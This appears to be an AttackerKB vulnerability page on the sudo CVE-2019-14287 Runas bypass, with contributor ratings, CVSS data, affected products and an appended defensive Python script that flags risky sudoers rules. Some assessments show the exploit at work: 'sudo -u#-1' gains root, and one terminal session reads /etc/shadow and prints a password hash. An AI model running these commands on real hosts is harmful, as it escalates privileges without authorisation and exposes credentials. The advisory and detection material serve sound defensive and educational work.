Attacker Value
Low
(5 users assessed)
Exploitability
Very High
(5 users assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network

CVE-2019-14287

Disclosure Date: October 17, 2019

Description

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a “sudo -u #$((0xffffffff))” command.


5
Ratings
Technical Analysis

Due to being almost 100% non-existent in the wild, this is only useful in CTF environments. The exploit is extremely easy to trigger, and I weep for the machine that has this configured in the wild.

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

I’ve seen Runas specifications on exactly two servers in the wild. I think it’s even rarer that you would specify ALL and !root in the same specification, though it is a better application of the principle of least privilege.

More importantly, privilege escalation is contingent on having access to a command that can escape to a shell or otherwise execute arbitrary code or commands. Cool bug, but the use case for this is minimized.

Here’s a contrived example of the bug in action:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: /usr/bin/whoami
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u ubuntu whoami
ubuntu
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$

You must specify # to use a UID.

Here’s another example where you’re not limited to a command, only the target users:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: ALL
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$ sudo -u#-1 cat /etc/shadow
root:*:17897:0:99999:7:::
daemon:*:17897:0:99999:7:::
bin:*:17897:0:99999:7:::
sys:*:17897:0:99999:7:::
sync:*:17897:0:99999:7:::
games:*:17897:0:99999:7:::
man:*:17897:0:99999:7:::
lp:*:17897:0:99999:7:::
mail:*:17897:0:99999:7:::
news:*:17897:0:99999:7:::
uucp:*:17897:0:99999:7:::
proxy:*:17897:0:99999:7:::
www-data:*:17897:0:99999:7:::
backup:*:17897:0:99999:7:::
list:*:17897:0:99999:7:::
irc:*:17897:0:99999:7:::
gnats:*:17897:0:99999:7:::
nobody:*:17897:0:99999:7:::
systemd-timesync:*:17897:0:99999:7:::
systemd-network:*:17897:0:99999:7:::
systemd-resolve:*:17897:0:99999:7:::
systemd-bus-proxy:*:17897:0:99999:7:::
syslog:*:17897:0:99999:7:::
_apt:*:17897:0:99999:7:::
lxd:*:17897:0:99999:7:::
messagebus:*:17897:0:99999:7:::
uuidd:*:17897:0:99999:7:::
dnsmasq:*:17897:0:99999:7:::
sshd:*:17897:0:99999:7:::
pollinate:*:17897:0:99999:7:::
vagrant:$6$pjYWAc.5$QYfO.wN80gnGe2kC1jYmSTGmO/qelG1CMl6ubKMbDQt9b1TEKZ648PQGI7VC88XE3ObdPBswUavsC1eDVZunJ.:17897:0:99999:7:::
ubuntu:!:18100:0:99999:7:::
vagrant@ubuntu-xenial:~$

3
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

Patch, but don’t freak out.

3
Ratings
Technical Analysis

As many others before me have stated, this CVE holds very little use other than in CTF environments.

To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:

<user> ALL=(ALL, !root) NOPASSWD: ALL

If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:

sudo -u#-1 <command>

You can also use the unsigned equivalent of -1: 4294967295.

To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass.
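As an added defensive check that is not part of this AttackerKB entry or of any contributor's assessment, the following Python script does the two things the post above describes by hand: it flags sudoers rules whose Runas user list grants ALL while excluding root, and it compares the sudo version against the fixed release 1.8.28. The sudoers text embedded in it is a constructed sample, the version parser assumes the first line of sudo -V output (for example "Sudo version 1.8.16"), and every function and variable name is the example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of an /etc/sudoers file for this example (not from a real host).
# Lines 4 and 5 have the policy shape CVE-2019-14287 bypasses: run as ALL, but not root.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
vagrant ALL=(ALL, !root) NOPASSWD: /usr/bin/whoami
deploy  ALL=(ALL, !root) NOPASSWD: ALL
backup  ALL=(postgres) /usr/bin/pg_dump
# alice ALL=(ALL, !root) ALL
"""

# First upstream release that rejects user IDs such as -1 / 4294967295 in the Runas check.
FIXED_VERSION = (1, 8, 28)

# The Runas specification is the parenthesised part of a rule: (user_list[:group_list]).
RUNAS_RE = re.compile(r"\(([^)]*)\)")


def parse_version(banner: str) -> Tuple[int, ...]:
    """Extract a comparable version tuple from the first line of 'sudo -V'
    (e.g. 'Sudo version 1.8.27p1' -> (1, 8, 27, 1))."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", banner)
    if not m:
        raise ValueError(f"unrecognised sudo version banner: {banner!r}")
    return tuple(int(part) for part in m.groups() if part is not None)


def version_is_vulnerable(banner: str) -> bool:
    """True when the major.minor.patch triple is older than 1.8.28."""
    return parse_version(banner)[:3] < FIXED_VERSION


def find_risky_runas(sudoers_text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_no, rule, excluded_users) for each rule whose Runas user list
    grants ALL while excluding root. Comment lines and directives (#include,
    #includedir) are skipped; Defaults lines carry no Runas specification."""
    hits = []
    for line_no, raw in enumerate(sudoers_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        match = RUNAS_RE.search(line)
        if not match:
            continue  # rule runs as root only; there is no exclusion list to bypass
        user_list = match.group(1).split(":", 1)[0]  # drop the group list, if any
        users = [u.strip() for u in user_list.split(",") if u.strip()]
        excluded = [u[1:] for u in users if u.startswith("!")]
        if "ALL" in users and "root" in excluded:
            hits.append((line_no, line, excluded))
    return hits


def assess(sudoers_text: str, version_banner: str) -> Dict[str, object]:
    """Combine both checks: a host is exposed only when an old sudo meets a risky rule.
    The rule shape itself is legitimate least privilege; the remedy is the upgrade."""
    hits = find_risky_runas(sudoers_text)
    old_sudo = version_is_vulnerable(version_banner)
    return {"sudo_vulnerable": old_sudo, "risky_rules": hits, "exposed": old_sudo and bool(hits)}


if __name__ == "__main__":
    # On a real host, read /etc/sudoers (root needed) and the first line of 'sudo -V'
    # instead of the constructed sample and banner used here.
    report = assess(SAMPLE_SUDOERS, "Sudo version 1.8.16")
    print("sudo older than 1.8.28:", report["sudo_vulnerable"])
    for line_no, rule, excluded in report["risky_rules"]:
        print(f"line {line_no}: {rule}  (excluded: {', '.join(excluded)})")
    print("exposed:", report["exposed"])
```

Two caveats when running this against real hosts: rules also live under /etc/sudoers.d, so feed every file there through find_risky_runas as well, and distributions backport the fix without bumping the upstream version string, so on a packaged sudo treat the version test as a hint and confirm against the package changelog before reporting a host as exposed.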

CVSS V3 Severity and Metrics
Base Score: 8.8 High
Impact Score: 5.9
Exploitability Score: 2.8
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • canonical
  • debian
  • fedoraproject
  • netapp
  • opensuse
  • redhat
  • sudo project

Products

  • debian linux 10.0
  • debian linux 8.0
  • debian linux 9.0
  • element software management node
  • enterprise linux 8.0
  • enterprise linux desktop 6.0
  • enterprise linux desktop 7.0
  • enterprise linux eus 7.5
  • enterprise linux eus 7.6
  • enterprise linux eus 7.7
  • enterprise linux eus 8.1
  • enterprise linux eus 8.2
  • enterprise linux eus 8.4
  • enterprise linux server 5.0
  • enterprise linux server 6.0
  • enterprise linux server 7.0
  • enterprise linux server aus 6.5
  • enterprise linux server aus 6.6
  • enterprise linux server aus 7.2
  • enterprise linux server aus 7.3
  • enterprise linux server aus 7.4
  • enterprise linux server aus 7.6
  • enterprise linux server aus 7.7
  • enterprise linux server aus 8.2
  • enterprise linux server aus 8.4
  • enterprise linux server tus 7.2
  • enterprise linux server tus 7.3
  • enterprise linux server tus 7.4
  • enterprise linux server tus 7.6
  • enterprise linux server tus 7.7
  • enterprise linux server tus 8.2
  • enterprise linux server tus 8.4
  • enterprise linux workstation 6.0
  • enterprise linux workstation 7.0
  • fedora 29
  • fedora 30
  • fedora 31
  • leap 15.0
  • leap 15.1
  • openshift container platform 4.1
  • sudo
  • ubuntu linux 12.04
  • ubuntu linux 14.04
  • ubuntu linux 16.04
  • ubuntu linux 18.04
  • ubuntu linux 19.04
  • virtualization 4.2
